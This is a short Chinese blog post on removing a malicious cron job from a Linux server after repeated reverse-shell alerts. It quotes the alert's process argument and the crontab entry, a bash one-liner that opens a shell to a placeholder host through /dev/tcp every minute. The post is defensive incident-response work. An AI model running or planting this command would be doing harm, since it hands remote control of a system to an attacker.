热门标签
热门文章
- 1FPGA千兆网 UDP 网络视频传输,基于B50610 PHY实现,提供2套工程和QT上位机源码加技术支持_纯fpga实现通过以太网给上位机传数据
- 2矿大python学习通实验7
- 33 数据仓库主流开发语言--SQL_数据仓库 语言
- 434岁程序员面试美团被拒绝:只招30岁以下,卖力能加班工资又少的_美团java开发有年龄限制吗
- 5数模中的模型检验_数学建模检验模型的作业效率
- 6Android Studio的settings.gradle配置
- 7如何用低代码开发平台搭建本地化部署?_怎么把低代码引擎配置到本地
- 8pip使用阿里云镜像单次和永久加速_pip 阿里云
- 9沪深websocket level2/level1行情推送接入示例
- 10一个好用的MQTT客户端软件
当前位置: article > 正文
linux服务器告警反弹shell行为_反弹shell事件上报
作者:繁依Fanyi0 | 2024-04-28 02:35:19
赞
踩
反弹shell事件上报
客户今天持续收到服务器告警,给出了可以参数信息
检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.
告警说明:Linux反弹shell行为
crontab -l发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1
cat /var/log/cron | grep /dev/tcp/服务器iP/端口 再去看cron日志,果然一分钟一次
crontab -e果断将里面的内容清空,到此告警消失
声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
![【Linux】服务器时区 [ CST | UTC | GMT | RTC ]_linux上服务器时区](https://img-blog.csdnimg.cn/img_convert/7ca7738362d74dc0867c0c0ec139a490.png?x-oss-process=image/resize,m_fixed,h_300,image/format,png)
相关标签
